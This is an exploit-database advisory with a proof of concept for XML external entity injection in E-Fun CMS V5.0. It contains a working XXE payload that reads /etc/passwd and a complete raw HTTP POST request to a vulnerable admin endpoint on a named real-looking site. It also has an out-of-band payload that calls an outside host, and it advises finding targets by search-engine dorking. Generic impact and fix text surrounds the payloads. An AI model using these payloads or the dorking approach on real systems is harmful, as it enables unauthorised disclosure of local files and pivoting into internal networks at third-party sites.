Share
## https://sploitus.com/exploit?id=PACKETSTORM:174170
====================================================================================================================================  
| # Title : E-Fun CMS V5.0 XML external entity injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |  
| # Vendor : http://www.e-fun.com.tw/ |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] Vulnerability description :  
  
XML supports a facility known as "external entities",   
which instruct an XML processor to retrieve and perform   
an inline include of XML located at a particular URI.   
An external XML entity can be used to append or modify   
the document type declaration (DTD) associated with an   
XML document. An external XML entity can also be used   
to include XML within the content of an XML document.   
  
Now assume that the XML processor parses data originating   
from a source under attacker control. Most of the time   
the processor will not be validating, but it MAY include   
the replacement text thus initiating an unexpected file   
open operation, or HTTP transfer, or whatever system ids   
the XML processor knows how to access.   
  
below is a sample XML document that will use this functionality   
to include the contents of a local file (/etc/passwd)  
  
target : http://127.0.0.1/landtopcomtw/webadmin/  
  
<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE indoushka [  
<!ENTITY indoushka SYSTEM "file:///etc/passwd">  
]>  
<xxx>&indoushka;</xxx>  
  
POST /webadmin/_chkpasswd.php HTTP/1.1  
Content-type: text/xml  
Host: landtop.com.tw  
Content-Length: 175  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*  
  
<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE dt5fqyt [  
<!ENTITY dt5fqytent SYSTEM "http://hityjSWv9cxlI.bxss.me/">  
]>  
<_chkpasswd.php>&dt5fqytent;</_chkpasswd.php>  
  
  
[+] Affected items :  
  
/webadmin/   
/webadmin/_chkpasswd.php   
/webadmin/index.php   
  
[+] The impact of this vulnerability :  
  
Attacks can include disclosing local files,   
which may contain sensitive data such as passwords   
or private user data, using file: schemes or relative   
paths in the system identifier. Since the attack occurs   
relative to the application processing the XML document,   
an attacker may use this trusted application to pivot   
to other internal systems, possibly disclosing   
other internal content via http(s) requests.  
  
[+] How to fix this vulnerability :  
  
If possible it's recommended to disable parsing of XML external entities.  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |  
=======================================================================================================================================